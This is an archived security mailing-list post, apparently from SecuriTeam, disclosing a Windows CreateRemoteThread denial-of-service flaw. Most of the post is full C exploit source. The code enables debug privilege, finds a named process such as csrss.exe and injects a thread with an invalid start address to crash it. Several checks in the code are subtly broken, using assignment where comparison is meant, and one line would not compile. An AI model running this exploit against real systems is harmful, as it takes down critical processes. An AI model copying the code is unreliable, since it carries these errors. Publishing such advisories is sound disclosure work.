Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[EXPL] Microsoft Windows CreateRemoteThread DoS (Exploit)

from [SecuriTeam] Network Security [Permanent Link]
Subject: [EXPL] Microsoft Windows CreateRemoteThread DoS (Exploit)
Date: 8 Dec 2005 16:11:41 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Microsoft Windows CreateRemoteThread DoS (Exploit)
------------------------------------------------------------------------


SUMMARY

The following exploit call the function CreateRemoteThread() with the 
following parameters "Process,0,0,x,0,0,0", which in turn will cause all 
the processes opened by the OpenProcess function, to crash, effectively 
causing a aDoS.

DETAILS

Vulnerable Systems:
 * Windows XP SP 2 and prior
 * Windows 2000 PRO SP 4 and prior
 * Windows 2000 Server SP 4 and prior
 * Windows 2000 AdvServer SP 4 and prior
 * Windows 2003 AdvServer SP 1 and prior

Exploit:
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

BOOL exploit(char* chProcessName)
{
 HANDLE hProcessSnap = NULL;
 HANDLE hProcess = NULL;
 BOOL bFound = FALSE;
 BOOL bRet = FALSE;
 PROCESSENTRY32 pe32 = {0};
 UINT uExitCode = 0;
 DWORD dwExitCode = 0;
 LPDWORD lpExitCode = &dwExitCode;
   HANDLE hToken;
  TOKEN_PRIVILEGES tp;
  LUID luid;

  if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | 
TOKEN_QUERY | TOKEN_READ,&hToken))
    return FALSE;

  if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
    return TRUE;

  tp.PrivilegeCount = 1;
  tp.Privileges[0].Luid = luid;
  tp.Privileges[0].Attributes = 1 ? SE_PRIVILEGE_ENABLED : 0;

  AdjustTokenPrivileges(hToken,FALSE,&tp,0,0,0);

  CloseHandle(hToken);
  hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  
    if (hProcessSnap = INVALID_HANDLE_VALUE)
    return (FALSE);

   pe32.dwSize = sizeof(PROCESSENTRY32);
  
    printf("\n[+] Search For Process ... \n");

   while(!bFound && Process32Next(hProcessSnap, &pe32))
   {
       if(lstrcmpi(pe32.szExeFile, chProcessName) = 0)
           bFound = TRUE;
   }
   
   CloseHandle(hProcessSnap);
   if(!bFound){
    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 
FOREGROUND_RED| FOREGROUND_INTENSITY) ;
    printf("[-] Sorry Process Not Find \n");
   
    return(FALSE);
 
  }
   printf("[+] Process Find \n");
  
   hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION, 
FALSE, pe32.th32ProcessID);
   if(hProcess = NULL){
    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 
FOREGROUND_RED| FOREGROUND_INTENSITY) ;
   printf("[-] Exploit Failed :( \n");

   return(FALSE);
   }
   printf("[+] Send Exploit To Process ...\n");
   CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *)(void 
*))100,0,0,0);
   printf("[+] Successful :)\n");
   return(pe32.th32ProcessID);
}

int main(int argc,char **argv)
{
char* chProcess = argv[1];
   
       COORD coordScreen = { 0, 0 };
   DWORD cCharsWritten;
    CONSOLE_SCREEN_BUFFER_INFO csbi;
    DWORD dwConSize;
    HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);

    GetConsoleScreenBufferInfo(hConsole, &csbi);
    dwConSize = csbi.dwSize.X * csbi.dwSize.Y;
    FillConsoleOutputCharacter(hConsole, TEXT(' '), dwConSize, 
coordScreen, &cCharsWritten);
    GetConsoleScreenBufferInfo(hConsole, &csbi);
    FillConsoleOutputAttribute(hConsole, csbi.wAttributes, dwConSize, 
coordScreen, &cCharsWritten);
    SetConsoleCursorPosition(hConsole, coordScreen);

    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 
FOREGROUND_GREEN| FOREGROUND_INTENSITY) ;
   if(argc !=2) {
 printf("\n");
    printf(" ===================================== \n");
 printf(" > Microsoft Windows CreateRemoteThread Exploit Version 2.0 
(0day) < \n");
    printf(" > Now All Process Will Crash < \n");
 printf(" > BUG Find By Q7X ( Nima Salehi ) Q7X@Ashiyane.com < \n");
  
 printf(" > Exploited By Q7X ( Nima Salehi ) Q7X@Ashiyane.com < \n");
         SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 
FOREGROUND_RED | FOREGROUND_INTENSITY|FOREGROUND_GREEN|FOREGROUND_BLUE);

 
    printf(" > Compile : cl -o nima.c ( Win32/VC++ ) < \n");
    
 printf(" > Usage : nima.exe Process < \n");
 printf(" > Example : nima.exe csrss.exe < \n");
 printf(" > Tested on : Windows XP (SP0 ,SP1 ,SP2) , Windows 2000 
AdvServer (SP4) < \n");
    printf(" > Windows 2000 Server (SP4), Windows 2003 (SP0 , SP1) < \n");
    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 
FOREGROUND_RED| FOREGROUND_INTENSITY) ;
 
 printf(" > Copyright 2002-2005 By Ashiyane Digital Network Security Team 
< \n");
    printf(" > www.Ashiyane.com ( Free ) www.Ashiyane.net ( Not Free ) < 
\n");

 printf(" > Special Tanx To My Best Friends : Behrooz_Ice - ActionSpider < 
\n");
    printf(" > illwill - m_lover_2003 - silversmith - crash - Uranium < 
\n");
    
 printf(" ===================================== \n");
  }
    else
  exploit(chProcess);

 SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED 
|FOREGROUND_GREEN|FOREGROUND_BLUE);
}

/* EoF */


ADDITIONAL INFORMATION

The information has been provided by  <mailto:nima.salehi@gmail.com> Nima 
salehi.
The original article can be found at:  <http://www.ashiyane.com/> 
http://www.ashiyane.com/



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] Microsoft Windows CreateRemoteThread DoS (Exploit), SecuriTeam <=
Previous by Date:  [NEWS] Dell TrueMobile 2300 Wireless Broadband Router Authentication Bypass, SecuriTeam
Next by Date:  [EXPL] FileZilla DoS Exploit (Long USER), SecuriTeam
Previous by Thread:  [NEWS] Dell TrueMobile 2300 Wireless Broadband Router Authentication Bypass, SecuriTeam
Next by Thread:  [EXPL] FileZilla DoS Exploit (Long USER), SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]